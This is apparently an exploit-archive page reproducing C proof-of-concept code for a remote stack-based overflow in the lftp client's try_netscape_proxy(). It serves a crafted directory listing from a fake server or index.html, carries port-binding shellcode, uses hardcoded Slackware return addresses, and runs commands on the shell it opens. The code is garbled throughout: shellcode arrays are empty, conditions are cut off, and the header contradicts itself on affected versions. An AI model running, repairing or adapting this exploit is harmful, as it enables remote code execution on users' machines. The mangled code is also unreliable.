lftp 2.6.9 Remote Stack based overflow Exploit

                              * lftp remote stack-based overflow exploit by Li0n7 voila fr
                              * Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se
                              * Lftp versions later than 2.6.10 are prone to a remotly exploitable stack-based
                              * overflow in try_netscape_proxy() and try_squid_eplf( (src/HttpDir.cc). This
                              * bad coded proof-of-concept demonstrates the exploitation by exploiting the
                              * vulnerable function try_netscape_proxy() (HttpDir.cc:358) and it needs more targets
                              * to be efficient. Please note that this vulnerability is really hard to exploit
                              * since lots of parameters come into play and are different from a platform to another,
                              * for we have to overwrite some variables and registers before overwriting eip.
                              * With some time and lot of patience, you should find your own parameters by using
                              * GDB. Params to edit are marked with a '!' in the POC code. Moreover, I have edited
                              * Bighawk's port binding shellcode not to contain any white character such as \r,\t,\v,
                              * \f,\n or \20 because we are exploiting a sscanf function.
                              * usage: ./lftp-exp [-f ][-p ][-r ][-t ]
                              * -f : create index.html
                              * -p : run a fake lftp server on port  (default: 80)
                              * -r : return address you would like to use
                              * -t : choose the target among the platforms available
                              * Platforms supported are:
                              * num: 0 - slack 9.0 - 0xbffff770
                              * For instance: ./lftp-exp -p 80 -t 0
                              * ./lftp-exp -f / -t 0
                              * A poil !


                              #define BUFFERSIZE 117 /*!*/
                              #define SIZE 256

                              #define D_BACK 26112
                              #define D_RET 0xbffff770
                              #define D_PORT 80

                              #define DUMMY1 0xbffff140 /*!*/
                              #define DUMMY2 0xbffff810 /*!*/

                              #define OK "cd ok, cwd=/\n"

                              /* Edited bighawk 78 bytes portbinding shellcode */
                              /* size: 80 bytes */
                              /* Does not contain any white character i.e \r,\t,\v,\f,\n,\20 */

                              char shellcode[] =

                              char badc0ded[] =

                              char *lftp_versions[] =


                              unsigned long ret_addr = D_RET;

                              int back_connection(long host);
                              int check_shellcode(char *host);
                              void check_version();
                              char * build(char *host);
                              int create_file(char *path);
                              void wait_connection(int port);
                              long resolve_host(u_char *host_name);
                              void die(char *argv);

                              struct os_ret_addr
                              int num;
                              char *plat;
                              long ret;

                              struct os_ret_addr exp_os[]=
                              {0,"slack 9.0",0xbffff770},

                              main(int argc,char *argv[])
                              int i, option, port = D_PORT;
                              long host = 0;
                              char * option_list = "f:p:r:t:", path[128];

                              opterr = 0;

                              if (argc  65535 || port  0xbfffffff || ret_addr  i || atoi(optarg) empty Fri May 30 10:09:06 2001 %s\n",build("+"));
                              written = write(fd,buffer,512);
                              if(written != 512)
                              fprintf(stderr,"[-] %s\n",strerror(errno));
                              fprintf(stdout,"[+] File %s successfuly created.\n",file);
                              return 0;

                              back_connection(long host)
                              struct sockaddr_in s;
                              u_char sock_buf[4096];
                              fd_set fds;
                              int fd,size;
                              char *command="/bin/uname -a ; /usr/bin/id;\n";

                              fd = socket(AF_INET, SOCK_STREAM, 0);
                              if (fd empty\tFri May 30 10:09:06 2001 %s\n",build((char*)inet_ntoa(s.sin_addr)));

                              size = send(fd2, request, strlen(request), 0);
                              if(size h_addr, host_ent->h_length);


                              die(char *argv)
                              int i;
                              fprintf(stdout,"\t Remote exploit for lftp ][-p ][-r ][-t ]\n",argv);
                              fprintf(stdout," -f : create index.html\n");
                              fprintf(stdout," -p : run a fake lftp server on port  (default: 80)\n");
                              fprintf(stdout," -r : return address you would like to use\n");
                              fprintf(stdout," -t : choose the target among the platforms available\n");
                              fprintf(stdout," Platforms supported are:\n");
                              for(i=0; exp_os[i].plat != NULL; i++)
                              fprintf(stderr," num: %i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
                              fprintf(stdout,"\n Vulnerability discovered by Ulf Harnhammar  \n");
                              fprintf(stdout," Contact me: \n\n");

 F-VNS Security™  Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits